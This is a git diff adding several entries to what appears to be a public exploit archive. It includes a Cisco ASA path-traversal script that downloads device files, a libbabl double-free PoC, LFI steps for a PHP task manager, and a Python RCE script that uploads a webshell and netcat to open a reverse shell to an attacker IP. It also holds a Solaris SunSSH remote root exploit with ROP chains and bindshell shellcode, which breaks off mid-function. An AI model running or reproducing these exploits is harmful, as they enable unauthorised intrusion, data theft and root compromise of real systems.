diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py new file mode 100755 index 000000000..3ae7ad1f6 --- /dev/null +++ b/exploits/hardware/webapps/49262.py @@ -0,0 +1,113 @@ +# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) +# Date: 12 Dec 2020 +# Exploit Author: Freakyclown@cygenta.co.uk +# Vendor Homepage: cisco.com +# Software Link: It’s against Hardware, specifically ASA’s and FTD’s +# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1) +# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14 +# CVE : CVE-2020-3452 +# Github : https://github.com/cygenta/CVE-2020-3452 + +import requests + +# Written by freakyclown for @CygentaHQ +# Cisco ASA Path Traversal +# CVE-2020-3452 +# Usage: CVE-2020-3452.py {target}" +# Example: CVE-2020-3452.py 192.168.0.12" +# Requires - Requests - pip3 install requests +# +# This tool takes advantage of the above cve and attempts to +# download files as listed below, it is suggested that you make +# a working folder for the outputfiles to avoid confusion if +# attacking mutliple ASA's + +# set your target +target = input("Enter target IP/Url: ") + + +def grabstuff(): + for file in files: + print("trying: ", file) + + #set request parameters + params = ( + ('type', 'mst'), + ('textdomain', '+CSCOE+/'+file), + ('default-language', ''), + ('lang', '../'), + ) + + # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems + response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False) + # write the file to the disk + f = open(file,"w") + f.write(response.text) + f.close() + + + +# this is a list of files available to download, more will be added in time +# if anyone has a list of ASA files, I'd be happy to add here +files = { +"sess_update.html", +"blank.html", +"noportal.html", +"portal_ce.html", +"portal.html", +"logon_custom.css", +"svc.html", +"logo.gif", +"portal_inc.lua", +"nostcaccess.html", +"session.js", +"portal.js", +"portal_custom.css", +"running.conf", +"tlbrportal_forms.js", +"logon_forms.js", +"win.js", +"portal.css", +"lced.html", +"pluginlib.js", +"useralert.html", +"ping.html", +"app_index.html", +"shshimdo_url", +"session_password.html", +"relayjar.html", +"relayocx.html", +"color_picker.js", +"color_picker.html", +"cedhelp.html", +"cedmain.html", +"cedlogon.html", +"cedportal.html", +"portal_elements.html", +"commonspawn.js", +"common.js", +"appstart.js", +"relaymonjar.html", +"relaymonocx.html", +"cedsave.html", +"tunnel_linux.jnlp", +"ask.html", +"no_svc.html", +"preview.html", +"cedf.html", +"ced.html", +"logon_redirect.html", +"logout.html", +"tunnel_mac.jnlp", +"gp-gip.html", +"auth.html", +"wrong_url.html", +"logon.html"} + + +# obvious thing is obvious, try the things and barf if fail +try: + grabstuff() +except Exception as err: + print("Something went wrong sorry") + print(err) \ No newline at end of file diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c new file mode 100644 index 000000000..524a43d2c --- /dev/null +++ b/exploits/linux/local/49259.c @@ -0,0 +1,57 @@ +# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC) +# Date: December 14, 2020 +# Exploit Author: Carter Yagemann +# Vendor Homepage: https://www.gegl.org +# Software Link: https://www.gegl.org/babl/ +# Version: libbabl 0.1.62 and newer +# Tested on: Debian Buster (Linux 4.19.0-9-amd64) +# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c + +/* + * Babl has an interesting way of managing buffers allocated and freed using babl_malloc() + * and babl_free(). This is the structure of its allocations (taken from babl-memory.c): + * + * typedef struct + * { + * char *signature; + * size_t size; + * int (*destructor)(void *ptr); + * } BablAllocInfo; + * + * + * signature is used to track whether a chunk was allocated by babl, and if so, whether + * it is currently allocated or freed. This is done by either pointing it to the global + * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44). + * + * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173): + * + * void + * babl_free (void *ptr, + * ...) + * { + * ... + * if (freed == BAI (ptr)->signature) + * fprintf (stderr, "\nbabl:double free detected\n"); + * + * + * Or so the developers think. As it turns out, because babl internally uses libc's malloc() + * and free(), which has its own data that it stores within freed chunks, most systems will + * overwrite babl's signature variable upon freeing, breaking the double free detection. + * The simple PoC below demonstrates this: + */ + +#include +#include +#include + +#include + +int main(int argc, char **argv) { + void *buf = babl_malloc(42); + babl_free(buf); + // BUG: reports an "unknown" pointer warning when the following is clea= +rly a double free + babl_free(buf); + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt new file mode 100644 index 000000000..e61a6f1c1 --- /dev/null +++ b/exploits/php/webapps/49258.txt @@ -0,0 +1,26 @@ +# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion +# Exploit Author: İsmail BOZKURT +# Date: 2020-12-15 +# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: Windows 10 x86_64 + +Step 1. Log into application with credentials +Step 2. Click on Branch +Step 3. Select New Branch http://127.0.0.1/index.php?page=index +Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00 + +Note: php version < 5.3.3 + +section class="content"> +
+ \ No newline at end of file diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py new file mode 100755 index 000000000..1d2d8b55c --- /dev/null +++ b/exploits/php/webapps/49260.py @@ -0,0 +1,128 @@ +# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) +# Google Dork: N/A +# Date: 2020-14-12 +# Exploit Author: Andrea Bruschi - www.andreabruschi.net +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 / Xampp Server and Wamp Server + +#!/usr/bin/python3 + +import requests +import sys +import os +import iterm2 +import AppKit + +url = sys.argv[1] +mobile = sys.argv[2] +password = sys.argv[3] + +# CONFIGURE HERE +reverse_ip = '192.168.xx.xx' +reverse_port = 4444 + +# CONFIGURE HERE +# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL +netcat_path = '/local/path/to/nc.exe' +shell_path = '/local/path/to/shell.php' + + +def login(url, mobile, password): + + url = "{}/user/login.php".format(url) + payload = {'mobno':mobile, 'password':password, 'login':''} + req = requests.post(url, data=payload) + cookie = req.cookies['PHPSESSID'] + + return cookie + + +def upload(url, cookie, file=None): + + f = open(file, 'rb') + filename, ext = os.path.splitext(file) + + if "exe" in ext: + content_type = 'application/octet-stream' + else: + content_type = 'application/x-php' + + cookie = {'PHPSESSID':cookie} + url = "{}/user/marriage-reg-form.php".format(url) + + files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} + payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''} + req = requests.post(url, data=payload, cookies=cookie, files=files) + print(f'[+] File {ext} uploaded') + + +def get_remote_file(url, ext): + + url = "{}/user/images".format(url) + req = requests.get(url) + junk = req.text.split(ext)[0] + f = junk[-42:] + ext + + return f + + +def persistence(url, webshell, netcat): + + # webshell + payload_w = "copy /y {} shell.php".format(webshell) + url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w) + req_w = requests.get(url_w) + + # netcat + payload_n = "copy /y {} nc.exe".format(netcat) + url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n) + req_n= requests.get(url_n) + + print('[+] Persistence enabled') + + +def get_reverse(url, ip, port): + + payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port) + url_r = "{}/user/images/shell.php?cmd={}".format(url, payload) + print('[+] Reverse shell incoming!') + req = requests.get(url_r) + + +# CONFIGURE HERE +# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER +# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY +def start_listener(port): + + # Launch the app + AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2") + + async def main(connection): + app = await iterm2.async_get_app(connection) + window = app.current_window + if window is not None: + cmd = "nc -lnv {}".format(port) + await window.async_create_tab(command=cmd) + else: + print("No current window") + + iterm2.run_until_complete(main) + + + +if __name__ == "__main__": + + if len(sys.argv < 3): + print("Usage: exploit.py ") + else: + cookie = login(url, mobile, password) + upload(url, cookie, netcat_path) + upload(url, cookie, shell_path) + webshell = get_remote_file(url, '.php') + netcat = get_remote_file(url, '.exe') + persistence(url, webshell, netcat) + + start_listener(reverse_port) + get_reverse(url, reverse_ip, reverse_port) \ No newline at end of file diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c new file mode 100644 index 000000000..404c67bbe --- /dev/null +++ b/exploits/solaris/remote/49261.c @@ -0,0 +1,592 @@ +# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root +# Exploit Author: Hacker Fantastic +# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html +# Version: 11 +# Tested on: SunOS solaris 5.11 11.0 + +/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 + * ==================================================================== + * Makefile + * all: hfsunsshdx + * + * hfsunsshdx: main.c + * gcc main.c -o hfsunsshdx -lssh2 + * + * clean: + * rm -rf hfsunsshdx + * rm -rf core.* + * + * A trivial to reach stack-based buffer overflow is present in libpam on + * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() + * which allocates a fixed size buffer of 512 bytes on the stack and parses + * usernames into the buffer via modules (authtok_get) without bounds checks. + * This issue can be reached remotely pre-authentication via SunSSH when + * "keyboard-interactive" is enabled to use PAM based authentication. The + * vulnerability was discovered being actively exploited by FireEye in the + * wild and is part of an APT toolkit called "EVILSUN". The vulnerability + * is present in both SPARC/x86 versions of Solaris & others (eg. illumos). + * This exploit uses ROP gadgets to disable nxstack through mprotect on x86 + * and a helper shellcode stub. The configuration in a default Solaris + * install is vulnerable. The exploit makes use of libssh2 and tested on + * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable + * SunSSH implementation and versions later than 11.1 have updated SunSSH + * code that prevents the issue being triggered. + * + * e.g. + * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 + * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 + * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' + * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes + * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e + * [+] entering keyboard-interactive authentication. + * [-] number of prompts: 1 + * [-] prompt 0 from server: 'Please enter user name: ' + * [-] shellcode length 193 bytes + * [-] rop chain length 68 + * [-] exploit buffer length 580 + * [-] sending exploit magic buffer... wait + * [+] exploit success, handling payload... + * [-] connected.. enjoy :) + * SunOS solaris 5.11 11.0 i86pc i386 i86pc + * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 + * helpdesk console Nov 27 17:57 + * uid=0(root) gid=0(root) + * + * -- Hacker Fantastic (https://hacker.house) + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int sd = -1; +int oldsd = -1; +int ishell = -1; +char* buf; +char* payload; +char* retaddr; +struct sockaddr_in sain; + +struct target { + char* name; + char* ropchain; +}; + +struct shellcode { + char* name; + char* shellcode; +}; + +void spawn_shell(int); +void bindshell_setup(short); +void on_alarm(int); +void on_interupt(int); +void prepare_payload(); + +const int targetno = 5; +struct target targets[] = { + {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", + "\x41\x42\x43\x44" // %ebx + "\x45\x46\x47\x48" // %esi + "\x50\x51\x52\x53" // %ebp + "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp + "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) + "\x01\x01\x04\x08" // %edx unused, must be writeable addr + "\x41\x42\x43\x44" // %ebp unused var + "\x93\xdb\xc8\xfe" // pop %edx ; ret + "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg + "\x1a\xe7\x0b\xfe" // dec %edx ; ret + "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret + "\x93\xdb\xc8\xfe" // pop %edx ; ret + "\x01\x30\x04\x08" // ptr to shellcode + "\xe0\xe8\x3e\xfe" // mov $0x72,%al + "\x64\x7c\xc3\xfe" // inc %eax ; ret + "\x64\x7c\xc3\xfe" // inc %eax ; ret + "\x22\x9d\xd3\xfe"},// sysenter + {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", + "\x41\x42\x43\x44" // %ebx overwrite unused + "\x41\x42\x43\x44" // %esi overwrite unused + "\xf8\x32\x04\x08" // %ebp overwrite unused + "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret + "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) + "\x01\x30\x04\x08" // ptr for %edx + "\x44\x43\x42\x41" // ptr for %ebp unused + "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret + "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret + "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret + "\xeb\x30\x04\x08" // shellcode ptr for %edx + "\x1c\x33\x04\x08" // %ebp & used by "leave" + "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret + "\x41\x42\x43\x44" // %esi unused + "\xe0\x30\x04\x08" // shellcode ptr to %ebx + "\xe8\x32\x04\x08" // ptr into %ebp + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret + "\xfe\xf8\xcf\xfe"},// sysenter + {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", + "\xc3\x31\x04\x08" // overwrite %ebp unused + "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret + "\x29\x28\x07\x08" // pop %ebx ; ret + "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget + "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret + "\x01\x30\x04\x08" // %edx pointer to page + "\xb8\x31\x04\x08" // unused %ebp value + "\xaa\x4c\x68\xfe" // pop %ecx ; ret + "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) + "\x61\x22\x07\x08" // dec %edx ; ret + "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret + "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret + "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret + "\xc3\x31\x04\x08" // shellcode addr for %edx + "\xc3\x31\x04\x08" // unused %ebp value + "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) + {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", + "\xc3\x31\x04\x08" // overwrite %ebp unused + "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret + "\xb1\x26\x07\x08" // pop %ebx ; ret + "\xff\x01\xac\xfe" // write garbage here, unused gadget + "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret + "\xff\x2f\x04\x08" // %edx pointer to page + "\xc3\x31\x04\x08" // unused %ebp value + "\x57\xaa\xe4\xfe" // pop %ecx ; ret + "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) + "\xee\x6a\x65\xfe" // inc %edx ; ret + "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret + "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret + "\x86\xae\xe5\xfe" // pop %edx ; ret + "\xc3\x31\x04\x08" // shellcode return address for %edx + "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) + {"Solaris all Sun_SSH_1.x.x debug crash target", + "\x41\x42\x43\x43" // %ebp ptr + "\x78\x79\x80\x81"} // %eip ptr +}; + +const int shellno = 4; + +struct shellcode shellcodes[] = { + {"Solaris x86 bindshell tcp port 9999", + /* mprotect magic stub necessary for payloads expecting +x stack */ + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" + "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" + "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" + /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); + ================================================================== + xorl %eax, %eax + xorl %ecx, %ecx + movl $0x08041001, %ebx + movw $0x7001, %ax + movb $0x7,%cl + dec %ebx + dec %eax + pushl %ecx + pushl %eax + pushl %ebx + pushl %ebx + movl %esp, %ecx + xorl %eax, %eax + movb $0x74, %al + int $0x91 + */ + /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ + "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" + "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" + "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" + "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" + "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" + "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" + "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" + "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" + "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" + "\xb1\x3a\xfe\xd7\x2a\x95"}, + {"Solaris x86 bindshell tcp port 8080", + /* mprotect magic stub necessary for payloads expecting +x stack */ + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" + "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" + "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" + /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ + "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" + "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" + "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" + "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" + "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" + "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" + "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" + "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" + "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" + "\xb1\x3a\xfe\xd7\x44\x60"}, + /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ + {"Solaris 11.0 x86 bindshell tcp port 9999", + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" + "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" + "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different + "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" + "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" + "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" + "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" + "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" + "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" + "\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" + "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" + "\x9f\x56\x1b\x2c\xdf\x8f"}, + /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ + {"Solaris 11.0 x86 bindshell tcp port 4444", + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" + "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" + "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different + "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" + "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" + "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" + "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" + "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" + "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" + "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" + "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" + "\x0a\x39\x6b\xeb\x53\x6b"} +}; + +void spawn_shell(int sd) { +#define sockbuflen 2048 + int rcv; + char sockbuf[sockbuflen]; + fd_set readfds; + memset(sockbuf,0,sockbuflen); + snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); + write(sd,sockbuf,strlen(sockbuf)); + while (1) { + FD_ZERO(&readfds); + FD_SET(0,&readfds); + FD_SET(sd,&readfds); + select(255,&readfds,NULL,NULL,NULL); + if (FD_ISSET(sd, &readfds)) { + memset(sockbuf,0,sockbuflen); + rcv = read(sd,sockbuf,sockbuflen); + if (rcv <= 0) { + printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m"); + exit(-1); + } + printf("%s",sockbuf); + fflush(stdout); + } + if(FD_ISSET(0,&readfds)) { + memset(sockbuf,0,sockbuflen); + read(0,sockbuf,sockbuflen); + write(sd,sockbuf,strlen(sockbuf)); + } + } +} + +void bindshell_setup(short port){ + oldsd = sd; + sd = socket(AF_INET,SOCK_STREAM,0); + sain.sin_port = htons(port); + if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ + printf("[!] fatal bind shell failed\n\e[0m"); + exit(-1); + } + printf("[-] connected.. enjoy :)\e[0m\n"); + spawn_shell(sd); +} + +void on_alarm(int signum){ + printf("[+] exploit success, handling payload...\n"); + if(ishell==0||ishell==2){ + bindshell_setup(9999); + } + if(ishell==1||ishell==3){ + bindshell_setup(8080); + } + printf("[-] exploit complete\n\e[0m"); + exit(0); +} + +void on_interrupt(int signum){ + printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); + if(sd){ + close(sd); + } + if(oldsd){ + close(oldsd); + } + exit(0); +} + +void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ +#define payload_size 4096 + int len = strlen(payload); + buf = malloc(payload_size); + char randchar = 'A'; + char* randbuf = malloc(2); + if(!buf||!randbuf){ + printf("[!] fatal payload buffer error\n"); + exit(-1); + } + srand(time(NULL)); + memset(buf,'\x00',payload_size); + memset(randbuf,0,2); + printf("[-] shellcode length %d bytes\n",len); + if(len < 512 && payload_size > 1024){ + memcpy(buf,payload,len); + for(int i =0;i <= (512 - len);i++){ + randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; + memcpy(randbuf,&randchar,1); + strcat(buf,randbuf); + } + len = strlen(retaddr); + printf("[-] rop chain length %d\n",len); + if(len + 512 < payload_size){ + memcpy((void*)(long)buf+512,(void*)retaddr,len); + len = strlen(buf); + printf("[-] exploit buffer length %d\n",len); + } + else{ + printf("[!] exploit buffer miscalculated\n"); + exit(-1); + } + } + else{ + printf("[!] exploit buffer miscalculated\n"); + exit(-1); + } +} + +static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { + int i = 0; + signal(SIGALRM, &on_alarm); + printf("[+] entering keyboard-interactive authentication.\n"); + printf("[-] number of prompts: %d\n", num_prompts); + printf("[-] prompt %d from server: '", i); + fwrite(prompts[i].text, 1, prompts[i].length, stdout); + printf("'\n"); + prepare_payload(); + //uncomment to pause for gdb debugging + //sleep(10); + responses[i].text = strdup(buf); + responses[i].length = strlen(buf); + printf("[-] sending exploit magic buffer... wait\n"); + alarm(5); +} + +int main(int argc,char **argv){ + int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; + char* host; + int i, type, exitcode; + unsigned long hostaddr; + const char *fingerprint; + LIBSSH2_SESSION *session; + LIBSSH2_CHANNEL *channel; + char *exitsignal = (char *)"none"; + size_t len; + LIBSSH2_KNOWNHOSTS *nh; + static struct option options[] = { + {"server", 1, 0, 's'}, + {"port", 1, 0, 'p'}, + {"target", 1, 0, 't'}, + {"shellcode", 1, 0, 'x'}, + {"help", 0, 0,'h'} + }; + printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); + while(rc != -1) { + rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); + switch(rc) { + case -1: + break; + case 's': + if(ihost==0){ + host = malloc(strlen(optarg) + 1); + if(host){ + sprintf(host,"%s",optarg); + ihost = 1; + } + } + break; + case 'p': + port = atoi(optarg); + break; + case 'x': + if(ishell==-1) { + rc = atoi(optarg); + switch(rc){ + case 0: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 1: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 2: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 3: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + + default: + printf("[!] Invalid shellcode selection %d\n",rc); + exit(0); + break; + } + } + break; + case 't': + if(itarg==0){ + rc = atoi(optarg); + switch(rc){ + case 0: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + 